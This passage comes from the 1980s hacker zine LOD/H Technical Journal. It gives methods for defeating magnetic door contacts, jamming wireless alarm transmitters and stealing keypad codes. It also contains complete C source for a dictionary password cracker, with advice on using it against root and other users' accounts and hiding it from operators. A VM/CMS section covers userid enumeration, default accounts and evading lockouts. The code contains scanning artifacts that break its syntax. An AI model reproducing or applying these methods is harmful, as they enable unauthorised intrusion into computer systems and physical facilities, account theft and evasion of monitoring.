  1620.      C) The last criteria is to keep the magnet at the same or close to the
  1621.         same distance from the switch as the original magnet was. In some cases
  1622.         the device will be placed in such a manner that correct placement of
  1623.         the second magnet will be difficult if not impossible.
  1624.  
  1625. 3) Balanced Magnetic Contacts: These consist of one biased reed switch and one
  1626.    unbiased reed switch. The second reed will be of the correct sensitivity
  1627.    and position so as to not operate with the actuator magnet. It must also
  1628.    operate with the addition of a second magnet. It could be defeated by a
  1629.    single magnet that is moved into place as the door is opened. This requires
  1630.    coordinated movement of the door and magnet.
  1631.  
  1632. 4) Preadjusted Balanced Magnetic Contacts: These consist of three biased reed
  1633.    switches and may have an optional fourth tamper reed. Two reeds are
  1634.    polarized in one direction and the third is polarized in the opposite
  1635.    direction. The housing consists of three magnets with the polarity that
  1636.    corresponds to the switches. It is preadjusted to have a fixed space between
  1637.    the magnet and the switch. This is the most secure type of magnetic contact
  1638.    switch. The three-reed type could be defeated by using one of its own
  1639.    magnets, but not a bar magnet. The type with four reeds cannot be defeated
  1640.    with either of the two magnets because the fourth reed will activate when
  1641.    a magnet is brought within actuating distance. If you are able to determine
  1642.    which is the tamper reed, you can try to keep the three magnets in contact
  1643.    with the corresponding reeds. At the same time you must have the correct
  1644.    polarity, and in the process, not activate the tamper reed. If you
  1645.    accomplish those, you may be able to defeat it. This will most likely
  1646.    require two people and a bit of luck.
  1647.  
  1648.    The most secure devices are made of die cast aluminum instead of plastic,
  1649.    are explosion proof (for vaults and safes), have terminals mounted inside
  1650.    the housing which provides protection from tampering and shorting, and have
  1651.    armored cabling.
  1652.  
  1653.  
  1654. A wider break distance will prevent fasle alarms due to loose fitting doors,
  1655. thus, if the door is loose fitting it may have a wide break distance. The wider
  1656. the break distance, the easier it is to defeat. This will allow you to
  1657. introduce another magnet in cramped places since the door can be opened a wider
  1658. distance before an alarm condition occurs.
  1659.  
  1660. Some devices allow the installer to adjust the gap with a screwdriver instead
  1661. of placing the switch a certain distance from the magnet. In some devices, use
  1662. of any ferrous (Iron) material in the vicinity of the switch can cause a change
  1663. in gap distance. As a gap is increased, the switch may bias and latch. When
  1664. latched, the switch will remain closed even when the magnet is removed!! This
  1665. means that when you open the door, it thinks that the door is closed, and you
  1666. are able to stealthily go thru the door. You can test for a latched condition
  1667. by removing the magnet (opening the door) and using a Volt Ohm Meter, if it
  1668. reads INFINITY, the switch is OK. If not, it may be latched. If you can adjust
  1669. the gap to the point of it being latched, without being noticed, you've got it
  1670. made.
  1671.  
  1672.  
  1673. Wireless Switch Transmitters:
  1674.  
  1675. These are essentially the same as the other devices mentioned except that they
  1676. use an FM digital signal for alarm conditions (a door or window open) and for
  1677. maintenance conditions (low battery, transmitter malfunction/removal, long term
  1678. jamming, etc). There should be continuous polling and a maintenance alarm will
  1679. occur if the signal is missing for a few minutes. The transmitters are usually
  1680. powered by a couple of AAA 1 1/2V pen cells, which can last a few years. Most
  1681. devices will send out a signal after a specific interval. Common intervals are
  1682. about every 30 seconds. You can verify if the device is indeed sending out a
  1683. signal by placing a milliammeter capable of reading 10 ua in series with the
  1684. batteries and reading the discharge current. If it occurs every 30 seconds,
  1685. then it is sending out a signal every 30 seconds. A hint that this type of
  1686. device is in use, is since range generally decreases as a transmitter gets
  1687. closer to the floor, the transmitter will be placed as high as possible. The
  1688. transmitter probably has a range of about 200 feet, although some environments
  1689. may reduce this range due to construction materials inherent in the building.
  1690. The frequency should be in the 314 MHz range.
  1691.  
  1692. As was mentioned, these are the same as regular magnetic contact switches
  1693. except that there is a transmitter instead of a wire for transmitting alarm and
  1694. maintenance conditions, thus, the switch can be defeated in the same manner as
  1695. has been previously stated. Defeating an X-mitter is much easier than defeating
  1696. a wire. You can defeat the transmitter if you can sufficiently block or
  1697. diminish the signal strength so that the receiver is unable to receive it.
  1698. Radio waves have a tendency to bounce and reflect off of metallic surfaces,
  1699. which includes foil, and pipes. If you have located the transmitter, which
  1700. should be attached to or near the actual contact, you can block or jam the
  1701. signal as you open the door. Hopefully this will be between the 30 second
  1702. interval that it sends an "i'm ok" signal to the receiver, but it's not
  1703. critical to do so. As was stated, most receivers will not cause an alarm
  1704. condition if it doesn't recieve a signal once or twice, but after a few minutes
  1705. it will. So, as you open the door, it tries to send the signal, you block or
  1706. jam it, and you slip through without detection.
  1707.  
  1708. This information can also apply to security relating to the 'interior' of a
  1709. facility, ie. Part III of this series. Many of the techniques for defeating
  1710. magnetic contact switches are geared toward being inside the facility. Many
  1711. facilities have switches on doors to monitor movement of personnel within the
  1712. facility.  But it also is used on the exterior and some methods will work on
  1713. doors and possibly windows on the exterior. Of course, you have to have a way
  1714. of opening the door, and that follows.
  1715.  
  1716.  
  1717. DOORS AND LOCKS:
  1718. ----------------
  1719.  
  1720. As you know, doors are the primary entrance point into a building. Since they
  1721. are the primary target for unauthorized entry, they have the most security
  1722. added. I am not going to mention anything about the art of picking locks.
  1723. Although mechanical locks and keys have been the most common type of security
  1724. used in the past as well as today, I am going to concentrate on the more
  1725. advanced security systems in use.
  1726.  
  1727.  
  1728. Pushbutton keypad locks:
  1729. ------------------------
  1730.  
  1731. There are two types, mechanical and electronic. I will go into detail about
  1732. each. I will give you a few examples of these devices which comes directly from
  1733. brochures which I have been sent. I am merely summing up what they said.
  1734.  
  1735.  
  1736. Electronic:
  1737.  
  1738.  
  1739. Securitron DK-10:
  1740.  
  1741. This is a unit which has dimensions of 3x5x1". It has a stainless steel keypad
  1742. which is weatherproof, mounts via hidden screws and has no moving parts. The
  1743. keypad beeps as each button is pressed, and an LED lights when the lock is
  1744. released. It is slightly different in appearence than most other electronic
  1745. keypads:
  1746.  
  1747. +----+
  1748. ! 1A !  Each block (1A/B2) is one button. Thus, there are 5 buttons total on
  1749. ! B2 !  this device. The "/"'s at the bottom of the device represents the name
  1750. !    !  of the company and possibly the model number of the device.
  1751. ! 3C !  (ie. Securitron DK-10). It has 2-5 digit codes. Thus, a 2 digit code
  1752. ! D4 !  will have a maximum of 5 the the 2nd power (5 squared=25) combinations.
  1753. !    !  Of course it increases as the number of digits used increase.
  1754. ! 5E !  This unit has an 11 or 16 incorrect digit threshold. If it is reached
  1755. ! F6 !  a buzzer sounds for 30 seconds during which it will ignore any entries.
  1756. !    !  When a valid code is entered, the lock is released for a 5, 10, 15 or
  1757. ! 7G !  20 second interval.
  1758. ! H8 !
  1759. !    !
  1760. ! 9K !
  1761. ! L0 !
  1762. !    !
  1763. !////!
  1764. !////!
  1765. +----+
  1766.  
  1767.  
  1768. Sentex PRO-Key:
  1769.  
  1770. This device has a keypad resembling one of a payphone. It is a sealed, chrome
  1771. plated metal keypad. It has the standard 10 digits with * and #. It can have
  1772. up to 2000 individual codes with a lenght of 4 or 5 digits. It allows 8 time
  1773. zones, "2-strikes-and-out" software which is its invalid code threshold, and
  1774. anti-passback software.
  1775.  
  1776.  
  1777. Obtaining codes--
  1778. Your aim is to obtain the correct code in order to open the door. Plain and
  1779. simple. There are various methods in which you can accomplish this. You can try
  1780. to obtain a telescope or similar device and attempt to get the exact code as it
  1781. is being entered. This is obviously the quickest method. If you cannot discern
  1782. the exact code, the next best thing is to determine exactly how many digits
  1783. were entered, since most devices have variable code lengths. If you can make
  1784. out even one digit and when it was entered, you will substantially reduce the
  1785. possibilities. Another method is to put some substance on the keypad itself,
  1786. which preferably cannot be noticed by the user. After someone enters a code,
  1787. you can check the keypad to see where there are smudges or if you use what the
  1788. police use to find fingerprints, you can see what digits were pushed, although
  1789. you will have no idea in what order. This will drastically cut down the combos.
  1790. Say that someone enters a 5 digit code on a 10 digit keypad. You check the
  1791. keypad and see that, 1,2, 4, 7, and 9 were pushed. If you attempted brute
  1792. force, you will have 25 combinations to try. If a 4 digit code 'appeared' to be
  1793. entered, as 0, 2, 4, 8 were 'smudged', it is possible that one of the digits
  1794. were pushed twice. Keep that in mind. A way to know for sure would be to clean
  1795. the pad and 'dust' it, most fingerprints will be clear, but one will be less
  1796. clear than the others. Thus, you can be reasonably sure that the digit which is
  1797. smudged was pressed twice.
  1798.  
  1799. Thresholds--
  1800. Brute force attempts on electronic keypads is suicide. Once a certain number of
  1801. invalid attempts has been reached, it will probably be logged and a guard may
  1802. be dispatched. Your best bet is to try once or twice, wait (leave), try once
  1803. or twice again, wait, etc. Sooner or later you will get in.
  1804.  
  1805. Auditlogs--
  1806. Many of these devices are run on micro's. The software that runs these devices
  1807. allows for an increased ability to monitor the status of these devices. They
  1808. can track a person throughout the facility, record times of entry and exit,
  1809. and when the maximum invalid code threshold is reached.
  1810.  
  1811. Anti-passback--
  1812. This term is commonly used in card access control, but it applies differently
  1813. to keypads. This feature prevents the use of two codes being used at the same
  1814. time. That is, Joe Comosolo uses code #12345 and enters the building. Then,
  1815. you enter Mr. Comosolo's code, #12345 but the system knows that Joe is already
  1816. in the building, and has not entered his code before leaving. Thus, you do not
  1817. gain access, and that action is most likely recorded in the audit log. This
  1818. option will only be in effect when:
  1819.  
  1820. 1) Each individual has a different code.
  1821.  
  1822. 2) There is a keypad used for entry, and a keypad used for exit.
  1823.  
  1824.  
  1825. Tailgating--
  1826. This occurs when more than one person enters through a controlled access point.
  1827. Joe enters his code, and goes into the building. You follow Joe, and make it
  1828. in just before the door closes, or in the case of the devices waiting 10 or 20
  1829. seconds before the door locks again, you let it close, and open it before it
  1830. locks.
  1831.  
  1832. Open access times--
  1833. During peak morning, noon, and evening hours, a facility may set the system to
  1834. not require a code during, say, 8:55AM to 9:05AM, thus, enabling most anyone to
  1835. gain entry during that time.
  1836.  
  1837.  
  1838.  
  1839. The LOD/H Technical Journal: File #6 of 10
  1840.  
  1841.  
  1842. A Discreet Unix Password Hacker
  1843. -------------------------------
  1844.  
  1845. By Shooting Shark / Tiburon Systems  4 Mar 87
  1846.  
  1847.      Imagine this familiar situation:  you have an account on a Unix system.
  1848. Perhaps it's your account on your school's VAX, or an account you've hacked
  1849. yourself.  You'd like to collect more passwords to this system - perhaps
  1850. to the 'root' or 'bin' accounts so you can take control of the system, or the
  1851. password of the class hotshot who's going to get an 'A' on his compiler
  1852. project and upset the curve unless you go in and erase all of his files.
  1853. The problem is getting these passwords.  The most obvious method would be to
  1854. manually enter login/password combinations until you found one.  This is
  1855. slow (>10 seconds per try), will give you sore fingers, and multiple
  1856. invocations of the 'login' program may be noticed.  You could write a program
  1857. on your micro to dial up the site (*if* it has a dialup) and try passwords
  1858. from a login/password pool, but this is just as slow, ties up your computer
  1859. and your phone line, and again is subject to easy detection.  The solution
  1860. to this problem is to have the system itself hack passwords for you.
  1861. It can do this unattended and at a considerable speed while you go about
  1862. your life, and will be difficult to detect by system demigods.
  1863.  
  1864. Here is the C source for my program.  Upload it to your Unix site and
  1865. compile it.
  1866.  
  1867. --- cut here ---
  1868. /*
  1869.  * hpw.c v1.4: 8 October '86
  1870.  * Written by Shooting Shark / Tiburon Systems
  1871.  *
  1872.  */
  1873.  
  1874. #include <sys/file.h>
  1875. #include <stdio.h>
  1876. #include <pwd.h>
  1877. #include <signal.h>
  1878.  
  1879. struct     passwd *pwd, *getpwname(name);
  1880.  
  1881. int   len, abort(), endpwent();
  1882.  
  1883. char  crbuf[30], *strcpy(), *crypt(), *getpass(), *getlogin(), *pw, pwbuf[10];
  1884.  
  1885. main(argc, argv)
  1886. int argc;
  1887. char *argv[];
  1888. $
  1889.  
  1890. FILE *fopen(), *fp;
  1891.  
  1892. char *uname;
  1893. signal(SIGINT,abort);
  1894.  
  1895.  
  1896. if (argc !=3) $
  1897.      printf("usage : %s username pwfileXn",argv[0]);
  1898.      exit(-1);
  1899.      
  1900.  
  1901.  
  1902.  
  1903.  
  1904.  
  1905. if (!(pwd =getpwnam(argv[1]))) $
  1906.      printf("unknown user : %sXn",argv[1]);
  1907.      exit(-1);
  1908.      
  1909.  
  1910. if ((fp = fopen(argv[2], "r")) == NULL) $
  1911.      perror(argv[2]);
  1912.      exit(-1);
  1913.      
  1914.  
  1915.  
  1916.  
  1917. sprintf(crbuf,"%s",pwd->pw_passwd);
  1918.  
  1919. printf("hacking %sXn",argv[1]);
  1920. printf("encrypted password : %sXn",crbuf);
  1921.  
  1922. while (fgets(pwbuf, 20, fp) != NULL) $
  1923.      pwbuf[strlen(pwbuf)-1] = 'X0';
  1924.      pw = crypt(pwbuf,crbuf);
  1925.      if (!strcmp(pw,crbuf)) $
  1926.      printf("%s ==> %sXn",argv[1],pwbuf);
  1927.      exit(0);
  1928.      
  1929.      
  1930. printf("done -- password not found.Xn");
  1931.  
  1932.  
  1933.      endpwent();
  1934.  
  1935.  
  1936. 
  1937.  
  1938. abort()
  1939. $
  1940. printf("aborted while trying '%s'Xn",pwbuf);
  1941.  
  1942. exit(-1);
  1943. 
  1944.  
  1945. --- cut here ---
  1946.  
  1947. (Note - written on a Pyramid 90x running Berzerkeley Unix 4.2.  If you're
  1948. running SysV or something else you may have problems.  You probably
  1949. won't, but you might.)
  1950.  
  1951. Now that you have the above compiled into a file called 'hpw,' invoke
  1952. it with
  1953.  
  1954. % hpw username pwfile
  1955. ( % is the shell prompt; don't type it...)
  1956.  
  1957. where username is the login name of the user who's password you'd like
  1958. to hack, and pwfile is the path of a text file that contains the pool of
  1959. likely passwords.  Most sites will have a file of words for the 'spell'
  1960. spelling checker - it will probably be /usr/dict/words and contain at least
  1961. 15,000 potential passwords.
  1962.  
  1963. Hpw starts by loading the user's encrypted password from /etc/password and
  1964. stores it in crbuf.  It then starts reading words from the file you've
  1965. specified, encrypts them using the crypt() routine, and compares them to
  1966. the encrypted password.  If they match, the program outputs a line like:
  1967. 'shark ==> hispassword' and quits.  If they don't match, it goes on to the
  1968. next potential password.  If the program goes through the entire list and
  1969. doesn't find the correct password, it prints 'done -- password not found'
  1970. and quits.  If you hit ^C (or BREAK, or whatever your interrupt character
  1971. is) the program tells you which word in the file it had gotten to when
  1972. it was interrupted and quits.  Then, the next time you attempt to hack that
  1973. login name, you can start where you left off during the previous session.
  1974.  
  1975. The beauty of this program is that you can run it in background with the
  1976. output sent to a file and then log off, or play rogue, or whatever.  To
  1977. hack melody's password using /usr/dict/words as your pool file, and to
  1978. have all messages generated by the program sent to a file called 'out.file'
  1979. and run the program in background, you'd enter from csh:
  1980.  
  1981. % hpw melody /usr/dict/words > out.file &
  1982.  
  1983. the & signifies a background process.  The system will print something like:
  1984. [1] 90125
  1985. this means it's job number 1 for you, and has process id 90125.  To bring
  1986. the program back into the foreground, enter:
  1987.  
  1988. % %1
  1989.  
  1990. and to kill the process, type
  1991.  
  1992. % kill 90125
  1993.  
  1994. if you have hpw running in background and you're in csh, you can just log off
  1995. and the program will continue to silently gather passwords.  If you're under
  1996. the sh shell, you'll need to run the program with 'nohup' (read the man
  1997. entry for more info) or sh will kill the process when you log out.
  1998.  
  1999. Anyway, after you've given the program sufficient time to go through the
  2000. list (more on this in a second), log in again.  If the output file exists,
  2001. the program has completed its job.  Otherwise use 'ps' to see if the program
  2002. is still running.  cat the file and you'll see something like this:
  2003.  
  2004. hacking melody
  2005. encrypted password : K4h7iidD1vX0a
  2006. melody ==> joshua (or 'done -- password not found')
  2007.  
  2008. make a note of melody's password, rm the incriminating output file, and
  2009. move on to the next login name.  Easy, huh?
  2010.  
  2011. Now for the bad news:  The designers of Unix weren't stupid.  They
  2012. deliberately designed the crypt() routine so that it's unique (it's a minor
  2013. deviation of the DES, so you can't use a fast DES-busting program to attack
  2014. the /etc/passwd file).  This program uses the fastest possible method of
  2015. brute-force hacking Unix passwords, but it isn't too speedy itself.  I wrote
  2016. the program on a Pyramid 90x, which is a 32-bit multi-processor
  2017. RISC-architecture machine.  When running this program in foreground while I was
  2018. the only user on the system, it averaged 2 seconds per try.  You can expect
  2019. this performance on one of the better VAXen.  If you're on a Cray (sure...) it
  2020. might take the program 1/8 second per hack.  If you're on an AT running XENIX
  2021. or a PDP-11/44, expect 5 seconds per try.  (I really don't know how long it
  2022. would take, why don't some people time it and give me feedback...I'd appreciate
  2023. it.)
  2024.  
  2025. Realistically, if you're using the system's spelling-checker word list that
  2026. contains 20,000 words and you're running the program in background, give
  2027. it at least 12 hours.  If you have a system operator who likes to keep
  2028. track of people's long-running jobs, tell them via mail that you'll be
  2029. computing the limit of 1/x to infinity or something like that and they'll
  2030. leave the process alone. If you have your own file of 100 probable passwords
  2031. (such as 'joshua,' 'secret' or the person's name) it will take 10 minutes
  2032. or so to complete.  Sensible selection of potential passwords (most UNIX
  2033. systems don't allow passwords of less than 5 characters; attempt to change
  2034. your password to progressively shorter and shorter words until you find out
  2035. what your system's minimum length is) and running the program at strategic
  2036. times (like after midnight) will cut the time down.
  2037.  
  2038. Hackers who know 'C' (and everybody should know C by now; it's the best
  2039. language ever designed) will want to modify the program I've presented.
  2040. You may want to 'hard code' the username to be hacked and the pwfile path;
  2041. 'progname root word.file' on a process table might look a LITTLE suspicious
  2042. to snoopy system operators (and it goes without saying that you shouldn't
  2043. call the program 'hack' or 'hpw', nor leave the source unencrypted in your
  2044. directory).  Also, since the crypt() routine is universal, you can hard-code
  2045. the 'crbuf' variable with the encrypted password (from /etc/passwords)
  2046. of a user on another system!  When hardcoding a password, make sure you spell
  2047. it correctly, and that it contains exactly 13 characters of upper & lower case,
  2048. and/or numbers. I once successfully hacked the root account of an AT&T Micro in
  2049. Michigan on my local Pyramid 90x.  Thus I didn't need to take up space on the
  2050. guy's file system with the source and didn't have to run the program on his
  2051. slow system - once I obtained the 6300's /etc/passwd file from the person who
  2052. hacked into the system, I attacked it at my local site.  If you happen to have
  2053. a system of your own that runs Unix, you can hack any system's root account at
  2054. home, completely risk-free.
  2055.  
  2056. Unix is the best operating system I've ever used.  It's immensely powerful;
  2057. as demonstrated by the program above, it's easy to make the system work for
  2058. you.  If you have any questions, comments, criticisms, threats, etc, get in
  2059. touch with me - my primary goal is not to prove that I'm more of a Unix Wizard
  2060. than the other guy, but rather to do my part in the ongoing crusade to make
  2061. forbidden information available to the people who can use it.
  2062. 'Knowledge is Power,' as the saying goes.
  2063.  
  2064. -- Shark.
  2065. The LOD/H Technical Journal: File #8 of 10
  2066.  
  2067.                                    Lex Luthor
  2068.                                       and
  2069.                              The Legion Of Hackers
  2070.                                     Present:
  2071.  
  2072.                      Hacking IBM's VM/CMS Operating System
  2073.                                      Part A
  2074.  
  2075.  
  2076. INTRODUCTION:
  2077. -------------
  2078.  
  2079.     IBM mainframes make up over 50% of the mainframes used in the United
  2080. States. These systems are traditionally used in industries such as insurance,
  2081. banking, universities and so on. For some reason, IBM systems as a whole have
  2082. not been very popular with hackers. This may be due to the complexity of the
  2083. Operating Systems run on IBM systems compared to others such as UNIX or VMS.
  2084. Another reason may be that there is much variety from shop to shop. IBM systems
  2085. are more commonly modified and customized to fit an individual corporations
  2086. need and the lack of "universality" for commands, files, programs and other
  2087. procedures makes it difficult to attempt to use without any type of specific
  2088. documentation. The lack of detailed on-line help also hinders the hacker. I
  2089. believe that the VM/CMS Operating System is by far the best and easily learned
  2090. of the IBM systems. But compared to other Operating Systems like UNIX or VMS,
  2091. VM/CMS is cumbersome and harder to learn.
  2092.  
  2093.  
  2094. ACRONYMS:
  2095. ---------
  2096.  
  2097.      Before I even attempt to start this article, I will list the IBM-specific
  2098. acronyms used in this article and some others that you may find on various IBM
  2099. systems. I list them here so I will not have to do it throughout this article.
  2100. If you don't know what one of them means later, just refer back to this list.
  2101.  
  2102. VM/SP:    Virtual Machine/System Product
  2103. CP:       Control Program
  2104. CMS:      Conversational Monitoring System
  2105. HPO:      High Performance Option
  2106. VSE:      Virtual Storage Extended
  2107. MVS:      Multiple Virutal Storage
  2108. TSO:      Time Sharing Option
  2109. JES:      Job Entry System
  2110. CICS:     Customer Information Control System
  2111. VSAM:     Virtual Storage Access Method
  2112. VTAM:     Virtual Telecommunications Access Method
  2113. IX:       Interactive Executive
  2114.  
  2115. IPL:      Initial Program Load
  2116. IVP:      Istallation Verification Program
  2117. RSCS:     Remote Spooling Communications Subsystem
  2118. DASD:     Direct Access Storage Device
  2119. EREP:     Environmental Recording Editing and Printing
  2120. SNA:      Systems Network Architecture
  2121. NCCF:     Network Communications Control Facility
  2122. REXX:     Restructured Extended Executer Language
  2123. VTOC:     Volume Table Of Contents
  2124. DOCS:     Display Operator Console System
  2125. JCL:      Job Control Language
  2126. ACF:      Advanced Communications Functions
  2127. SQL/DS:   Structured Query Language/Data System
  2128. DBA:      Data Base Administrator
  2129. GCS:      Group Control System
  2130. SCP:      System Control Program
  2131. FDP:      Field Development Program
  2132. CNA:      Communications Network Application
  2133. POF:      Programmable Operator Facility
  2134. PSW:      Program Status Word
  2135. SSCP:     Subsystem Services Control Point
  2136. IPCS:     Interactive Problem Control System
  2137. DCSS:     Discontiguous Shared Segments
  2138. VMCF:     Virtual Machine Communications Facility
  2139. FIFO:     First In First Out
  2140. LIFO:     Last In First Out
  2141. AP:       Attached Processor
  2142. MP:       Multi-Processor
  2143. R/O:      Read/Only
  2144. R/W:      Read/Write
  2145.  
  2146.  
  2147. LOGGING IN:
  2148. -----------
  2149.  
  2150.      Typically, when you come across a CMS system, it will respond with:
  2151.  
  2152. VM/370 ONLINE
  2153. !
  2154.  
  2155. .
  2156.  
  2157.  
  2158. This message is somewhat of a contradiction. The majority of VM/CMS systems are
  2159. rarely run on actual 370 systems but on other processors, such as the 43XX
  2160. series and the 30XX series.
  2161.  
  2162. The period "." prompt is the surest way of verifying that you have indeed
  2163. connected to a VM/CMS system, aside from the "VM/370 ONLINE" message which is
  2164. usually printed. This prompt should not be confused with DEC's TOPS-10 system,
  2165. which also has the prompt of a period. The older versions of VM/CMS responded
  2166. as shown above. The newer versions will give you this menu:
  2167.  
  2168. Enter one of the following commands:
  2169.  
  2170.    LOGON userid                    (Example:  LOGON VMUSER1)
  2171.    DIAL userid                     (Example:  DIAL VMUSER2)
  2172.    MSG userid message              (Example:  MSG VMUSER3 GOOD MORNING)
  2173.    LOGOFF
  2174.  
  2175. This menu may vary from system to system, since they may opt to not allow a
  2176. command to be used before logging in and will omit it from the menu or they may
  2177. add some commands. When hacking a system this menu will appear before you can
  2178. attempt to login, thus becoming very tedious and time consuming especially at
  2179. 300 baud as you have to wait an eternity for each logon attempt.
  2180.  
  2181. Other responses after connecting are "Ready to Host", "Press break key to begin
  2182. session" and "Invalid Switch Characters". The last response is commonly found
  2183. on Telenet and other packet switched networks, in which you may have to specify
  2184. "VM" for a VM/CMS system, or "TSO" for a MVS/TSO system. There may be other IBM
  2185. systems to select from, or "VM" may not be a valid system. You may also have to
  2186. specify "LOGON VM" or just "LOGON" before the port selector connects you to the
  2187. host system.
  2188.  
  2189. LOGON can be abbreviated as just "L". A userid can be from 1-8 characters in
  2190. length, but the first character MUST be a letter (In most systems you come
  2191. across this will be true, but due to customization of systems, its possible
  2192. this and even the 8 character password limit may be extended). A typical logon
  2193. may look like:
  2194.  
  2195. .L COMOSOLO SYSGUESS NOIPL
  2196.  
  2197. "." is the system prompt, L is the LOGON command, COMOSOLO is the userid,
  2198. SYSGUESS is the password, and NOIPL is the only 'login qualifier' allowed for
  2199. the VM/CMS system. NOIPL specifies that the IPL name or device in the VM/SP
  2200. directory should not be used for an automatic IPL. IPL simulates the LOAD
  2201. button and the device address switches on the real computer console. Basically
  2202. it "boots" your part of the CMS system. This is another different concept. A
  2203. user can boot (or crash) their part of the system not the whole system (in most
  2204. cases). NOIPL would be used when a system dumps you into a program which allows
  2205. you little or no mobility such as a restricted menu of options (IE: A system
  2206. backup utility) and logs you off without gaining access to CMS. NOIPL will
  2207. prevent this program from running if it is listed in your automatic IPL entry
  2208. within the CP directory. This should allow you access to the system. Otherwise
  2209. the program was specified to run within your PROFILE EXEC which lists things to
  2210. be done upon logon. NOIPL is somewhat similar but not identical to the login
  2211. qualifier "/NOCOMMAND" for DEC's VAX/VMS systems.
  2212.  
  2213. If the Password Suppression Facility is installed on the system, you will
  2214. receive an invalid format message whenever the userid and password are entered
  2215. on the same line. This is obviously a security measure to prevent users from
  2216. entering their password in full view of anyone who may be watching as the
  2217. password is not "masked". Thus, you will have to enter your password on a
  2218. separate line when the system prompts you for it. The advantage of entering the
  2219. userid and password on one line (especially at 300 baud) is that you can try
  2220. more userids and passwords in a shorter period of time while still availing
  2221. yourself to the systems generousness of informing you when an invalid userid
  2222. has been entered.
  2223.  
  2224. Error messages:
  2225.  
  2226. There are various error messages one may encounter while logging into a VM/CMS
  2227. system. The ones you should be most concerned about are:
  2228.  
  2229. "Userid not in CP directory": When an invalid userid has been entered, you will
  2230. receive this message. This indication gives the hacker a distinct advantage for
  2231. gaining entry to the system. Probably the largest security hole for any system
  2232. is to tell you when a valid username has been entered. After all, obtaining a
  2233. valid userid is half the battle. The other half is obtaining a valid password.
  2234. Even the weakest Operating Systems no longer give an indication of when a valid
  2235. ID has been entered. Why IBM has not changed this is a mystery to me.
  2236.  
  2237. When a valid userid is entered you will be asked to enter a password if you did
  2238. not already do so. If the password is correct, the system will attempt to log
  2239. you on, if not, you will receive one of two messages:
  2240.  
  2241. "Logon unsuccessful--incorrect password": As has just been stated, a valid
  2242. userid has been entered but the password was incorrect. Passwords can be from
  2243. 1-8 characters long, but in many cases the minimum length is changed to be at
  2244. least three characters. There is no difference between upper and lower case
  2245. letters for either the userid or password as they are converted to upper case
  2246. by the system which is another security flaw as it reduces password
  2247. possiblities.
  2248.  
  2249. "Password incorrect - reinitiate logon procedure": This is the message received
  2250. on the older versions of VM/CMS, which means the same thing as the above msg.
  2251.  
  2252. "Maximum password attempts exceeded, try again later": The threshold has been
  2253. reached for userid and/or password attempts. You will receive this message
  2254. every time you attempt to logon after exceeding the threshold until a variable
  2255. period of time (Probably from 1 to 5 minutes) has elapsed. This locks out ALL
  2256. users who attempt to login to the system from that particuler line. I am not
  2257. sure whether this is recorded anywhere or whether it is sent to the System
  2258. Console so try to determine how many attempts normally trigger this and keep
  2259. just short of it.
  2260.  
  2261. "Already logged on": This message will appear when you attempt to logon with a
  2262. valid userid and password and that userid is already online. Unlike other
  2263. systems, VM/CMS will not allow the same userid to be logged on more than once.
  2264.  
  2265. "Userid missing or invalid": As it implies, nothing was typed after entering
  2266. the LOGON command, or the format for the userid was not correct, ie: using a
  2267. number as the first character or a control character was used somewhere in the
  2268. userid field.
  2269.  
  2270. "Error in CP directory": The CP directory is the main user directory for the
  2271. system. Entries in the directory contain: the userid and password, VM I/O
  2272. configuration, disk usage values, associated virtual and real addresses,
  2273. privilege classes, virtual processor size, and other options for each user.
  2274. Without the proper directory entry, a user cannot logon to the system.
  2275. Therefore receiving this error message.
  2276.  
  2277. "Command not valid before logon": This occurs when you enter anything other
  2278. than the commands listed in the menu, ie: entering BONEHEAD will return this
  2279. message even though "BONEHEAD" isn't a valid command. Why this is I don't know.
  2280. So don't get all excited that you found a valid command but couldn't execute it
  2281. since you weren't logged on.
  2282.  
  2283.  
  2284. Accounts:
  2285.  
  2286. By constantly compiling userids from various systems you should be able to
  2287. collect a nice list of accounts which may enable you to gain access to a
  2288. system. The following are a few which I have found:
  2289.  
  2290. OPERATOR
  2291. CMSBATCH
  2292. AUTOLOG1
  2293. OPERATNS
  2294. VMTEST
  2295. VMUTIL
  2296. MAINT
  2297. SMART
  2298. VTAM
  2299. EREP
  2300. RSCS
  2301. CMS
  2302. SNA
  2303.  
  2304. As usual, use the username as the password. Things still haven't changed from
  2305. the Hacking VAX/VMS series...people are just as stupid as they were a few years
  2306. ago.
  2307.  
  2308. There are many default accounts which have the passwords listed in some IBM
  2309. system manuals. These are hard to obtain and are very powerful since some
  2310. passwords are rarely changed. If you can get access to the defaults, it will
  2311. greatly expand your collection of systems, I guarantee it.
  2312.  
  2313.  
  2314. Dial:
  2315.  
  2316. DIAL is used to logically connect lines, whether they be switched (regular
  2317. dial-up phone lines), leased (dedicated), or logically attached (directly
  2318. connected), to a previously logged on multiple-access system. The DIAL command
  2319. is the only substitute for the logon command. On systems running more than one
  2320. Operating System, DIAL is used to connect the user to one of those systems.
  2321. It is rather common to find two or more Operating Systems running parallel or
  2322. "under" one another. This is quite different from most other systems, which run
  2323. alone on the machine. One machine, one Operating System, but not IBM. The
  2324. ability to have multiple systems running simultaneously and still providing the
  2325. user with the illusion of it being a single system, (ie: the whole idea behind
  2326. multi-tasking machines is to provide each user with the full resources of the
  2327. machine so quickly that it appears that he or she is the only one using the
  2328. system) sets IBM apart from most other computer manufacturers. Some of the
  2329. systems which run on IBM's are: VM/CMS, MVS/TSO, DOS/VSE, OS/VS1. Some others
  2330. are: MUSIC, JES and IX/370 which is IBM's version of UNIX which runs under
  2331. VM/SP.
  2332.  
  2333. It is always good to know what other systems are running, and if you are unable
  2334. to gain access to the 'primary' system, you may be able to gain access to one
  2335. of the 'secondary' system(s) by use of DIAL. Some systems will require you to
  2336. specify a line number for certain systems. Others will find a line for you if
  2337. one is not specified, assuming there are some allocated to that resource.
  2338. Userid's are also dialable. In some cases you have to dial through a particular
  2339. userid in order to gain access to certain systems or perform certain commands.
  2340. A typical logon to a DIALed system may look like:
  2341.  
  2342. .DIAL MUSICB
  2343.  
  2344. DIALED TO MUSICB   040
  2345.  
  2346. *Miscellaneous Computer Services MUSIC/SP 1.1  SIGN ON.
  2347.  
  2348. .RESET
  2349.  
  2350. DROP FROM MUSICB   040
  2351.  
  2352. VM/370
  2353. !
  2354.  
  2355. .
  2356.  
  2357. When it comes to finding a valid line number for systems that can be reached
  2358. via DIAL, you could be in for some trouble. If the system requires a line
  2359. number to be entered (unlike the above example, where line 040 was found
  2360. automatically) you will not only have to come up with a defined line number,
  2361. but one that is associated with the system you are attempting to access.
  2362. Usually you can find this information after logging on to the VM/CMS system in
  2363. various files, but if you cannot get in, you will have to sequentially enter
  2364. line numbers. Some that I have seen are 001, 01B, 41A, 040.
  2365.  
